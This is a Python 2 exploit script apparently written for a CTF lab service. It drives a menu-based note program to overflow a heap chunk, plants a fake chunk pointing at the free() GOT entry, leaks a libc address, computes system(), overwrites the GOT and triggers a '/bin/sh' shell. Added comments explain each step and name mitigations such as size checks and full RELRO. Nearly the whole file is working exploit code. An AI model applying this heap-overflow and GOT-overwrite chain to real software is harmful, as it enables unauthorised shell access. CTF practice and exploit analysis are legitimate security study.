#!/usr/bin/python
from Pwn import *
# Remote I/O helper from the author's Pwn library (not part of this gist); the
# host/port name the CTF lab service this script was written against. What
# mode=1 selects is not visible here. p.connect() is called separately in exploit().
p = Pwn(mode=1,host='lab02.matesctf.org',port=4001)
def add_node(nid, content):
    """Drive menu option 1 ("add") of the service over the global `p` channel.

    Waits for each prompt in turn and answers with the id, the size (taken as
    len(content)) and finally the raw content followed by a newline. Nothing
    here validates nid or content; they are forwarded as given.
    """
    dialogue = [
        ('Please choose an option :', '1\n'),
        ('Please give me an id:', nid + '\n'),
        ('Please give me a size:', str(len(content)) + '\n'),
    ]
    for prompt, reply in dialogue:
        p.read_until(prompt)
        p.write(reply)
    p.read_until('Please input your data:')
    p.send(content)
    p.write('\n')
def edit_node(nid, content):
    """Drive menu option 3 ("edit") of the service over the global `p` channel.

    Answers the id and size prompts, then sends `content` raw followed by a
    newline. The size sent is len(content); this wrapper does not compare it
    with the size the node was created with, so whatever length the caller
    supplies is passed straight to the service.
    """
    p.read_until('Please choose an option :')
    p.write('3\n')
    p.read_until('Please give me an id:')
    p.write('%s\n' % nid)
    p.read_until('Please give me a size:')
    p.write('%d\n' % len(content))
    p.send(content)
    p.write('\n')
def print_node(nid, size):
    """Drive menu option 4 ("print"): ask the service for `size` bytes of node `nid`.

    Only issues the request; the caller is responsible for reading the reply
    from `p` afterwards.
    """
    def answer(prompt, reply):
        p.read_until(prompt)
        p.write(reply + '\n')

    answer('Please choose an option :', '4')
    answer('Please give me an id:', nid)
    answer('Please give me a size:', str(size))
def delete(nid):
    """Drive menu option 2 ("delete") for node `nid` over the global `p` channel."""
    exchanges = (
        ('Please choose an option :', '2\n'),
        ('Please give me an id:', nid + '\n'),
    )
    for prompt, reply in exchanges:
        p.read_until(prompt)
        p.write(reply)
def exploit():
    """Run the author's CTF attack sequence against the service behind `p`.

    As written below: connect, create four nodes, free node '1', then re-edit
    node '2' with a payload longer than the 16 bytes it was created with (the
    author's "heap overflow" label); read 8 bytes back through the id 'F'*15,
    which exists only inside that payload ("leak system"); derive system_addr
    from the leaked free() address via the Pwn helper; write it back through
    the same id ("overwrite got"); and delete node '4' ("trigger system").

    Defender's reading: the chain relies on two target properties the author's
    comments point at -- an edit that accepts a size larger than the node's
    original allocation, and a GOT that is writable at runtime. Checking edit
    sizes against the stored allocation, and linking with full RELRO so the
    GOT is read-only after load, each break it on their own. Constants such as
    0x602018 and 0x31 are challenge-specific and are not derived here.
    """
    p.connect()
    # raw_input('> ')
    add_node('1'*15,'A'*16)
    add_node('2'*15,'/bin/sh\x00' + 'B'*8)
    add_node('3'*15,'C'*16)
    add_node('4'*15,'/bin/sh\x00' + 'B'*8)
    # print_node('1'*15,80)
    # heap_leak = p.recv(80)
    # heap_addr = p.up32(heap_leak[52:56])
    # print '[+] heap',hex(heap_addr)
    # Payload for edit_node on node '2'. Layout, with the author's labels:
    # 16 filler bytes, two packed words (0, 0x31), a 15-byte id 'F'*15 plus a
    # NUL, p32(0x10), p32(0x602018) ("free got"), then p32(0) and p32(0x41414141).
    # Word width of p.pack()/p.p32() comes from the Pwn library and is not visible here.
    fake_chunk = 'A'*16 + p.pack(0) + p.pack(0x31)
    fake_chunk+= 'F'*15 + '\x00' + p.p32(0x10) + p.p32(0x602018) # free got
    fake_chunk+= p.p32(0) + p.p32(0x41414141)
    delete('1'*15)
    # The size edit_node sends is len(fake_chunk), well above the 16 bytes node '2' was created with.
    edit_node('2'*15,fake_chunk) # heap overflow
    print_node('F'*15,8) # leak system
    leak = p.recv(8)
    free_addr = p.unpack(leak)
    # get_libc_offset() is a Pwn-library helper; where it looks the offset up is not visible here.
    system_addr = free_addr - p.get_libc_offset(free_addr,'free')
    # Python 2 print statements: this script does not run under Python 3 as-is.
    print '[+] free()',hex(free_addr)
    print '[+] system()',hex(system_addr)
    edit_node('F'*15,p.pack(system_addr)) # overwrite got
    delete('4'*15) # trigger system
    p.io()
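if __name__ == '__main__':
    # Guard the entry point so importing this module for reuse of the menu
    # wrappers does not connect to the remote host as a side effect.
    exploit()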